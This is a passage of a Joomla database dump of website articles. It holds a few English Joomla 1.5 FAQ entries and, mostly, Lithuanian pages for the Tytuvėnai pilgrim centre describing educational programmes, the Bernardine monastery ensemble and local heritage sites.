1.5?','what-languages-are-supported-by-joomla-15','','Within the Installer you will find a wide collection of languages. The installer currently supports the following languages: Arabic, Bulgarian, Bengali, Czech, Danish, German, Greek, English, Spanish, Finnish, French, Hebrew, Devanagari(India), Croatian(Croatia), Magyar (Hungary), Italian, Malay, Norwegian bokmal, Dutch, Portuguese(Brasil), Portugues(Portugal), Romanian, Russian, Serbian, Svenska, Thai and more are being added all the time.<br />By default the English language is installed for the Back and Front-ends. You can download additional language files from the <a href=\"http://extensions.joomla.org\" target=\"_blank\" title=\"Joomla! Extensions Directory\">Joomla!Extensions Directory</a>.','',-2,0,0,52,'2008-08-11 01:12:18',135,'','2008-08-11 01:12:18',135,0,'0000-00-00 00:00:00','2006-10-10 06:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',5,0,0,'','',1,8,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(167,251,'Does the PDF icon render pictures and special characters?','does-the-pdf-icon-render-pictures-and-special-characters','','Yes! Prior to Joomla! 1.5, only the text values of an Article and only for ISO-8859-1 encoding was allowed in the PDF rendition. With the new PDF library in place, the complete Article including images is rendered and applied to the PDF. The PDF generator also handles the UTF-8 texts and can handle any character sets from any language. The appropriate fonts must be installed but this is done automatically during a language pack installation.','',-2,0,0,52,'2008-08-11 17:14:57',135,'','2008-08-11 17:14:57',135,0,'0000-00-00 00:00:00','2006-10-10 14:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',7,0,0,'','',1,6,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(168,252,'I installed with my own language, but the Back-end is still in English','i-installed-with-my-own-language-but-the-back-end-is-still-in-english','','<p>A lot of different languages are available for the Back-end, but by default this language may not be installed. If you want a translated Back-end, get your language pack and install it using the Extension Installer. After this, go to the Extensions Menu, select Language Manager and make your language the default one. Your Back-end will be translated immediately.</p><p>Users who have access rights to the Back-end may choose the language they prefer in their Personal Details parameters. This is of also true for the Front-end language.</p><p> A good place to find where to download your languages and localised versions of Joomla! is <a href=\"http://extensions.joomla.org/index.php?option=com_mtree&task=listcats&cat_id=1837&Itemid=35\" target=\"_blank\" title=\"Translations for Joomla!\">Translations for Joomla!</a> on JED.</p>','',-2,0,0,52,'2008-08-11 17:18:14',135,'','2008-08-11 17:18:14',135,0,'0000-00-00 00:00:00','2006-10-10 14:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',7,0,0,'','',1,7,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(169,253,'Edukacinė programa “Kalėdų gėlė“','kaledu-gele','','<p>   </p>\n<p>Adventas – tai metas prieš  vienas didžiausias  metines šventes.<br />Tai laikas, kuris skiriamas laukti Jėzaus Kristaus gimimo – Kalėdų. Kaip laukimas, tai laikas, kai turėtume gyventi viltimi, nes ir gyvybės stebuklas, ir apskritai visų kalėdinių pažadų išsipildymas yra tai, ko mes laukiame. Tamsusis prieškalėdinis laikotarpis – tai ir žmonių fizinio bei dvasinio apsivalymo, stebuklingos ramybės ir taikos metas.<br />Ši edukacinė programa skiriama visiems – vaikams ir suaugusiems. Supažindinsime su advento ir kalėdų tradicijomis, kurių buvo laikomasi  vienuolynuose, ir tradicijomis bei papročiais, kurių laikėsi mūsų senoliai. Jūsų meilė, susikaupimas, kantrybė pražydins kalėdų gėlę ir kiekvieno gėlė bus kitokia – sugėrusi Jūsų rankų šilumą, papuošta jūsų išradingumo.<br />Edukacija vyksTytuvėnų bernardinų vienuolyno refektorinėje salėje visą adventą iki Trijų karalių šventės.</p>\n<p>Vadovė Rūta Krencienė (8-67877676)</p>','',0,0,0,52,'2011-11-30 16:50:38',135,'','2011-11-30 17:06:16',135,0,'0000-00-00 00:00:00','2011-11-30 16:50:38','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_section\":\"0\",\"link_section\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_vote\":\"0\",\"show_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_pdf_icon\":\"1\",\"show_print_icon\":\"1\",\"show_email_icon\":\"1\",\"language\":\"lt-LT\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',6,0,16,'','Edukacinė programa “Kalėdų gėlė“',1,347,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(170,254,'Kelmės regiono turizmo traukos objektas','turizmo-traukos-objektas','','<p style=\"TEXT-ALIGN: left\"> <br />Tytuvėnų bažnyčios ir bernardinų vienuolyno ansamblis – tai pagrindinis Kelmės regiono turizmo traukos objektas, kuris turi didžiulę istorinę, meninę, kultūrinę, religinę/sakralinę išliekamąją vertę. Bažnyčios ir bernardinų vienuolyno ansamblį sudaro net 11 į kultūros vertybių registrą įrašytų atskirų objektų.<br /><br />2008 metų spalio 27 dienos ūkio ministro įsakymu projektas „Tytuvėnų bernardinų vienuolyno ansamblio pritaikymas turizmo reikmėms“ buvo įtrauktas į Valstybės planuojamų turizmo projektų, finansuojamų iš 2007 m. - 2013 m. Europos Sąjungos paramos lėšų, sąrašą. Pagrindinis projekto tikslas buvo kompleksiškai pritaikyti Tytuvėnų Švenčiausiosios Mergelės Marijos bažnyčios ir bernardinų vienuolyno ansamblį turizmui, išlaikant objekto unikalumą ir autentiškumą, sukurti sąlygas privačioms investicijoms, piligrimystę ir turizmą skatinančioms, palaikančioms bei aptarnaujančioms paslaugoms ir veikloms vykdyti. Pradėjus eksplotuoti objektą bus sumažintas turizmo sezoniškumas, kadangi kultūros paveldo objektas vertingas ne tik savo išore, bet ir vidaus ekspozicija. Vienuolyne įkurtas Šiaulų vyskupijos bažnytinio paveldo muziejus. Pagrindinė muziejaus ekspozicijų salė įsikurs buvusioje vienuolyno bibliotekoje, joje bus eksponuojami liturginiai reikmenys iš Šiaulių vyskupijos bažnyčių, kitose celėse galėsime parodyti paveikslus, skulptūras iš Tytuvėnų bažnyčios.</p>\n<p style=\"TEXT-ALIGN: left\"> </p>\n<p style=\"TEXT-ALIGN: right\">VšĮ „Tytuvėnų piligrimų centro“ informacija</p>','',-2,0,0,52,'2011-11-18 14:47:51',135,'','2011-12-09 06:24:40',135,0,'0000-00-00 00:00:00','2011-11-18 14:47:51','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_section\":\"0\",\"link_section\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_vote\":\"0\",\"show_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"lt-LT\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',2,0,17,'','',1,551,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(171,255,'Edukacinė programa  „Žaliasparnio angelo gėlė“','angelo-gele','','<p>Ši edukacinė programa skiriama tiek vaikams, tiek suaugusiems. Gėlę lankstysime iš ryškiaspalvių perskaitytų žurnalų puslapių. Tausodami gamtą - popierių, kuriame buvo atspausdinta informacija, panaudosime dar kart. Mokysimės kurti ir džiaugtis savo rankų darbu, kurio rezultatas taps mielu atsiminimu apie apsilankymą  Tytuvėnuose ar mažyte dovanėle, pradžiuginančia artimą žmogų.</p>\n<p>Ekologinis judėjimas semiasi įkvėpimo iš pranciškonų tradicijos. Šv. Pranciškaus „Sesers saulės“ giesmė yra malda, kuri moko kalbėtis su Dievu ir kiekviename kūrinyje matyti Kūrėjo prisilietimą. Ištikimas Šv. Raštui, Asyžiaus neturtėlis kviečia atpažinti gamtoje nuostabią knygą, kuri kalba apie Dievą, Jo grožį ir Jo gerumą...</p>\n<p>Pagarba žmogui ir pagarba gamtai yra viena, ir abu gali augti ir būti teisingai vertinami, jei žmoguje ir gamtoje yra gerbiamas Kūrėjas ir jo kūrinys. Jūsų susikaupimas ir kantrybė pražydins kiekvienam vis kitokią gėlę, sugėrusią Jūsų rankų šilumą, papuoštą Jūsų išradingumo.</p>\n<p>Veiklos aprašymas:</p>\n<ol>\n<li>Teminis pasakojimas-„Asyžiaus neturtėlis ir brolija“( pranciškonų ordino istorija,pranciškonai Tytuvėnuose ) 30min. Užsiėmimas vyks vienuolyno ir bažnyčios erdvėse.</li>\n<li>Gėlės lankstymas- Užsiėmimas vyks vienuolyno ansamblio pastatuose.</li>\n</ol>\n<p style=\"padding-left: 60px;\">Iš spalvingo reklaminių žurnalų popieriaus, iš spalvoto popieriaus išlankstomi penki gėlės žiedlapiai, jie sukliuojami, gaunamas vienos gėlės žiedas - šį  žiedą padaro kiekvienas užsiėmimo dalyvis. Jei dalyvių yra 12 ar daugiau, 12 žiedų sukliuojama į gėlyną. Jei dalyvių mažai ar darbelis sekasi sunkiau, ar  kokios nenumatytos aplinkybės, organizatoriai dovanoja grupei jau suklijuotą gėlyną, kad dalyviai idėją galėtų įvykdyti namuose.</p>\n<p style=\"padding-left: 60px;\">Užsiėmimo trukmė - 1 valanda.Užsiėmimo trukmę galima derinti.</p>\n<p style=\"text-align: left;\">Vadovė Rūta Krencienė (8-67877676)</p>\n<p style=\"text-align: center;\"><span style=\"line-height: 115%; font-family: &quot;Times New Roman&quot;; font-size: 12pt; mso-fareast-font-family: Calibri; mso-ansi-language: LT; mso-fareast-language: EN-US; mso-bidi-language: AR-SA;\" lang=\"LT\"><span style=\"color: #000000;\"><img src=\"images/stories/veikla/rsz_angelo_gele.jpg\" border=\"0\" width=\"344\" height=\"248\" /> </span></span></p>','',0,0,0,52,'2012-02-29 11:34:35',135,'','2012-02-29 14:11:28',135,0,'0000-00-00 00:00:00','2012-02-29 11:34:35','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_section\":\"0\",\"link_section\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_vote\":\"0\",\"show_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"lt-LT\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',8,0,15,'','',1,992,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(172,256,'Edukacinė programa „Su  maldos vėriniu per pasaulį“','veriniu-pasaulis','','<p>Piligriminė kelionė – tai nepaprasta religinė patirtis, maldos kelyje. Piligrimui, trokštančiam išgyventi bendrystę su Dievu ir pagilinti savo krikščioniškąjį gyvenimą, ypač svarbi malda, būtinos tylos ir atsitraukimo į vienumą akimirkos. Krikščioniškus maldos karolius, vadinamąjį rožančių ar rožinį galima rasti ne tik skarotų močiučių rankinėse, (ir ne tik ant futbolo ir kitų žvaigždžių kaklo :)  bet ir dažno piligrimo kuprinėje. Ką šnabžda karolėlius varstančio žmogaus lūpos, kur kyla mintys, kokia prasmė dešimtis kartų kartoti tuos pačius žodžius, kur šios meditatyvios maldos tradicijos ištakos?..</p>\n<p>Edukacija „Su maldos vėriniu per pasaulį“ kviečia į kelionę, kurioje ir rasime atsakymus į šiuos ir daugelį kitų kylančių klausimų. Apžiūrėsime maldos karolius iš skirtingų pasaulio vietų ir aptarsime jų maldos būdus, peržvelgsime krikščioniškųjų maldos vėrinių istoriją. Aplankysime  Tytuvėnų vienuolio bernardino celę ir pamatysime autentišką XIXa. vienuolio rožinį.</p>\n<p>Šios edukacijos metu išmoksime šlapiąja technika nusivelti kamuoliukus, ir sujungti juos į maldos vėrinį, kuris, galbūt, taps palydovu jūsų kelionėse, o gal - mielu prisiminimu ar dovanėle iš Tytuvėnų.</p>\n<p>Edukaciją užbaigsime asmeninio susikaupimo ir tylos valandėle, kada, pasirinktoje ansamblio vietoje, galėsite skirti laiko maldai su vėriniu.</p>\n<p><em><strong>Veiklos aprašymas</strong></em>: trukmė: apie 2val. Teorinė-praktinė edukacija skirta vaikų (nuo 9 metų)  ir/arba suaugusiųjų grupėms. Optimaliausias grupės dydis – 10 žmonių.</p>\n<p><em><strong>Edukacijos tikslai</strong></em>:</p>\n<ul>\n<li>sužinoti daugiau apie maldos su vėriniu prasmę;</li>\n<li>išgyventi rožinio maldos patirtį;</li>\n<li>supažindinti su skirtingų religijų maldos vėrinio būdais ir tradicijomis;</li>\n<li>didinti tarpreliginį supratimą ir toleranciją;</li>\n<li>susipažinti su tekstilės technikomis – vilnos vėlimu ir mazgų rišimu.</li>\n</ul>\n<p><em><strong>Edukacijos metu dalyviai</strong></em></p>\n<ul>\n<li>teoriškai ir praktiškai susipažins su maldos vėrinio tradicijomis įvairiose pasaulio religijose (induizme, budizme, islame, krikščionybėje);</li>\n<li>apžiūrės skirtingus maldos vėrinius, o taip pat ir autentišką Tytuvėnų muziejuje saugomą bernardinų vienuolio rožinį;</li>\n<li>pasigamins kelioninį rožinį, tuo pačiu praktiškai išbandys vilnos vėlimo ir/arba mazgų rišimo technikas;</li>\n<li>turės galimybę praktiškai išbandyti rožinio maldą.</li>\n</ul>\n<p>Vadovė : savanorė S. Krenciūtė (8 68218992)</p>\n<p style=\"text-align: center;\"><img src=\"images/stories/veikla/rsz_verinys.jpg\" border=\"0\" width=\"315\" height=\"236\" /></p>\n<p> </p>','',0,0,0,52,'2012-02-29 13:47:29',135,'','2012-02-29 14:12:50',135,0,'0000-00-00 00:00:00','2012-02-29 13:47:29','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_section\":\"0\",\"link_section\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_vote\":\"0\",\"show_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"lt-LT\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',2,0,14,'','',1,852,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(173,257,'Lankytini objektai','kultros-paveldo-objektai','','<p> </p>\r\n<table border=\"0\">\r\n<thead>\r\n<tr>\r\n<td colspan=\"2\"><strong><span style=\"font-size: 19px;\">Tytuvėnų bažnyčios ir vienuolyno ansamblis</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/kpaveldas/tytuvenu_baznycia/{/gallery}</td>\r\n<td>\r\n<p><span>Žemaitijos pietrytinėje dalyje, Tytuvėnų miestelyje XVII-XVIII a. pastatytas unikalus tėvų bernardinų vienuolynas. Vienuolyno ir bažnyčios ansamblis įkurtas ant skardingo, kažkada patvenkto Tytuvos upelio kranto, o vakarinė ansamblio dalis remiasi į centrinę Tytuvėnų aikštę.</span></p>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\">\r\n<p>Bernardinų kompleksui tinkama statybų vieta buvo renkama net ketverius metus, o apsispręsti padėjo pranašiškas ženklas. Vieną 1618 m. naktį būsimas statybų vadovas Tomas Kasparas su savo pameistriu pamatė ant kalnelio šviesulį, kurio nepajėgė užgesinti tą naktį siautęs vėjas. Regėjimas palaikytas stebuklu ir vienuolynui buvo parinkta kalnelio vieta.</p>\r\n<p>Netrukus ten padėtas kertinis bažnyčios akmuo ir pradėta rengtis statyboms, nors pamatai pakloti tik 1619 m. Bažnyčios ir vienuolyno statyba bei vidaus įrangos darbai užtruko iki 1635 m. lapkričio 1 d.</p>\r\n<p>Per tą laikotarpį iškilo seniausia ansamblio dalis – bažnyčia ir prie pietinio šventovės šono prišlietas, uždarą keturkampį kiemą formuojantis vienuolyno pastatas. Rytinėje bernardinų valdų pusėje pradėtas kurti ūkinis sektorius.</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>Bažnyčios ir vienuolyno sienos gausiai išpuoštos tapyba, taip pat ištapytos beveik visų patalpų medinės durys, o atlikti darbai aprašyti bernardinų kronikoje. Iš daugybės kronikoje minimų tapytų siužetų iki mūsų dienų beliko tik menki fragmentai ir tapyba dekoruotos zakristijos durys.</p>\r\n<p>1736 m. vienuolyne įkurtas noviciatas, tačiau mūrinis jo pastatas baigtas statyti tik 1770 m. Manoma, kad įkūrus noviciatą gerokai padidėjo vienuolyno bibliotekos rinkiniai.</p>\r\n<p>Šio konvento biblioteka, pradėta kaupti nuo pat bernardinų atvykimo į Tytuvėnus, XVIII–XIX a. garsėjo kaip solidžiausia visoje Žemaitijoje.</p>\r\n<p>Šiandien buvusio bernardinų vienuolyno ir bažnyčios ansamblis yra vienas iš geriausių barokinių ansamblių Lietuvoje ir Šiaurės Rytų Europoje.</p>\r\n<p>VšĮ „Tytuvėnų piligrimų centras“, Maironio g. 2a, Tytuvėnai, Kelmės r. sav., tel. (8 427) 56223, el. p. <a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a>, interneto svetainė <a href=\"http://www.infotytuvenai.lt/\">www.infotytuvenai.lt</a>.</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr align=\"left\">\r\n<td style=\"text-align: left; width: 210px;\" colspan=\"2\" valign=\"top\">\r\n<p><strong><span style=\"font-size: 19px;\">Kelmės dvaro sodyba</span></strong></p>\r\n</td>\r\n</tr>\r\n<tr align=\"left\">\r\n<td style=\"text-align: left; width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/kpaveldas/kelmes_krasto_muziejus/{/gallery}</td>\r\n<td>\r\n<p>Kelmės krašto muziejus įsikūręs Kelmės dvaro rūmuose. Muziejaus ekspozicijos išdėstytos trijuose šio ansamblio pastatuose: rūmuose, vartuose ir svirne. Kelmės dvaro ansamblis – valstybės saugomas kultūros paveldo objektas, vertinamas kaip retai išlikusi baroko stiliaus Lietuvos provincijos dvaro sodyba. Kelmės dvaro ansamblio mūriniai rūmai statyti 1780 m., dviaukščiai bokšto išvaizdos vartai – 1668 m. Kelmės dvaro sodybos teritorijos plotas kartu su parku – 15,2 ha. Iki šių dienų yra išlikę devyni šios sodybos dvaro laikotarpio pastatai. Daugiau kaip 300 metų Kelmės dvarą valdė lenkų kilmės bajorai Gruževskiai (Gruzewski).</p>\r\n<p>Kelmės dvaras – vieta, kur pirmiausiai Lietuvoje prasidėjo 1831 metų sukilimas prieš carinę Rusiją.1936 m. Šaulių sąjungos namuose buvo atidarytas pirmasis Kelmės muziejus. Antrojo pasaulinio karo metais visi jo eksponatai dingo.1949–1962 m. veikė Kelmės valstybinis muziejus, vėliau tapęs visuomeniniu. Jo eksponatus perėmė Kelmės krašto muziejus, kuris buvo įkurtas 1990 m. Šiuo metu muziejuje saugoma apie 21 tūkst. eksponatų. Muziejuje ir jo filialuose yra kaupiamos Kelmės krašto istoriją bei kultūrą atspindinčios muziejinės vertybės.</p>\r\n<p>Muziejaus adresas:</p>\r\n<p>Dvaro g. 15, LT-86111 Kelmė, tel. (8 427) 61 065</p>\r\n<p>Faks. (8 427) 61 065</p>\r\n<p>El. p. kelmesmuziejus@gmail.com</p>\r\n<p><a href=\"http://www.kelmesmuziejus.lt/\">www.kelmesmuziejus.lt</a></p>\r\n<p>Muziejaus darbo laikas:</p>\r\n<p>Pirmadienį – penktadienį – 8–12 val., 13–17 val.</p>\r\n<p>Vasaros metu:</p>\r\n<p>pirmadienį – penktadienį – 8–12 val., 13–17 val.</p>\r\n<p>šeštadienį – sekmadienį – 10–14 val.</p>\r\n</td>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<p><strong><span style=\"font-size: 19px;\">Kelmės Švč. Mergelės Marijos ėmimo į dangų bažnyčia</span></strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/kpaveldas/marijos_baznycia/{/gallery}</td>\r\n<td>\r\n<p>1900 m. patvirtintas architekto J. Dzekonskio mūrinės bažnyčios projektas. 1901 m. medinė bažnyčia nugriauta, pamaldos perkeltos į Verpenos koplyčią. 1901 m. pašventinti būsimos bažnyčios pamatai. Darbus prižiūrėjo architektas Nikolajus Andrejevas.</p>\r\n<p>Klebono Petro Janušausko rūpesčiu bažnyčia 1908 m. pastatyta (tais pačiais metais ji konsekruota).1910–1914 m. veikė Lietuvių katalikų blaivybės draugijos skyrius.</p>\r\n<p>Architektūra</p>\r\n<p>Bažnyčia neogotikinė, lotyniško kryžiaus plano, su trisiene apside ir aukštu fasado bokštu. Stogų kryžmoje yra bokštelis. Vidus 3 navų, atskirtų pilioriais. Šventoriaus tvora mūrinė, su arkiniais vartais.</p>\r\n<p>Adresas: S. Dariaus ir S. Girėno g. 20, Kelmė</p>\r\n<p>Tel. (8 427) 61185</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong><span style=\"font-size: 19px;\">Kelmės evangelikų reformatų bažnyčia</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/kpaveldas/avangeliku_baznycia/{/gallery}</td>\r\n<td>\r\n<p><strong>Istorija</strong></p>\r\n<p>Pastatyta 1615 m., po gaisro 1767 m. Jurgio Gruževskio lėšomis 1807 m. atstatyta. Renovuota 1992 m.</p>\r\n<p><strong>Architektūra</strong></p>\r\n<p>Bažnyčia vienanavė, stačiakampio plano, su beveik tokio paties pločio presbiterija, užsibaigiančia trisiene apside. Po presbiterija rūsyje buvo erdvi kripta. Prie pagrindinio fasado centre stovi monumentalus aukštas kvadratinio plano bokštas. Visų patalpų perdangos skliautinės.</p>\r\n<p>Nava ir presbiterija dengtos kryžminiais skliautais, kurie dekoruoti siauromis tinko nerviūromis, imituojančiomis žvaigždžių piešinį. Nerviūros kampuose sueina į piliastrus, kurių kapitelių ir bazių profiliai renesansiniai. Apsidę nuo navos skiria arka.</p>\r\n<p>Bokšto pirmame aukšte – prieangis kryžminiais skliautais, iš kurio mūriniais sraigtiniais laiptais patenkama į bokšo patalpas ir į pastogę; antrame aukšte yra vargonų choras.</p>\r\n<p>Adresas: <span>Vytauto Didžiojo g. 75, Kelmė</span></p>\r\n<p><span>Tel. (8 427) 52450</span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\"><strong><span style=\"font-size: 19px;\">Tytuvėnų regioninis parkas</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 210px;\" valign=\"top\">{gallery cols=7 orientation=vertical width=200}stories/kpaveldas/trp/{/gallery}</td>\r\n<td>Įspūdingiausias kraštovaizdžio elementas – ežerų grandinė. Ežerai čia tarsi suverti ant vienos gijos ledyno tirpsmo vandens išgraužtame slėnyje. Tytuvėnų regioninis parkas neįsivaizduojamas be tyruliais vadinamų pelkynų, akmenų pylimų „rūžų“, be Tytuvėnų bažnyčios ir vienuolyno architektūrinio ansamblio ir Šiluvos koplyčios.\r\n<p>Kraštovaizdis. Išraiškingas kalvotas, ežeringas, pelkėtas regioninio parko kraštovaizdis – ledynmečio palikimas. Banguotos, kalvotos lygumos nusileidžia į plačiais durpynais virtusias žemumas. Klampūs Užpelkių miškai žymi buvusių prieledyninių marių vietą, grakščios smėlio kalvos, apaugusios šilais. Didžiuliai pelkynai čia vadinami tyruliais.</p>\r\n<p>Negyvoji gamta. Išraiškingos kalvos, gilios daubos, didžiuliai ištysę pelkių guoliai, ežerai (Bridvaišio, Giliaus, Apušio ir Gauštvinio). Unikalūs, tik šioje Lietuvos dalyje aptinkami ledynų suformuoti akmenų pylimai vietos žmonių „rūžomis“ vadinami.</p>\r\n<p>Gyvoji gamta. Prie Gauštvinio ežero prigludusiuose šlapiuose, pelkėtuose miškuose gausu retų augalų, jų bendrijų ir gyvūnų. Didelę parko biologinę įvairovę lemia kraštovaizdžio įvairovė: pelkės, pelkėtos paežerės, išeksploatuoti durpynai, sausos pušynais apaugusios kalvos, niūrūs ir tamsūs eglynai.</p>\r\n<p>Kultūros paveldas. Tytuvėnus labiausiai garsina XVII a. bažnyčios ir vienuolyno architektūrinis ansamblis. Erdvų kiemą juosia vienintelė Lietuvoje uždara arkadų galerija, kieme esančioje koplyčioje įrengti laiptai, kuriais besimeldžiantys lipa klūpomis. Vienuolyne daug senovinių freskų, autentiškos vienuolių celės. Šiluvoje, stebuklingo apsireiškimo vietoje pastatyta garsaus architekto Antano Vivulskio projektuota koplyčia. Įdomi senoji turgaus aikštė su aplink ją esančiu ne vienu įdomiu senoviniu mediniu namu. Yra ir pagonišką kultūrą menančių paminklų: Bridvaišio, Šiaulelių, Pašakarnėlio ir Kudinų piliakalniai, Kuršių, Debeikių ir Rinkšelių pilkapynai, buvusi pagoniškojo kulto vieta Šv. Jurgio kalnelis.</p>\r\n<p>Tytuvėnų regioninio parko lankytojų centras:</p>\r\n<p>Miško g. 3, Tytuvėnai, Kelmės r.</p>\r\n<p>Tel./faks. (8 427) 59 031</p>\r\n<p>El. paštas tytuvenurp@trp.lt</p>\r\n<p>Interneto svetainė 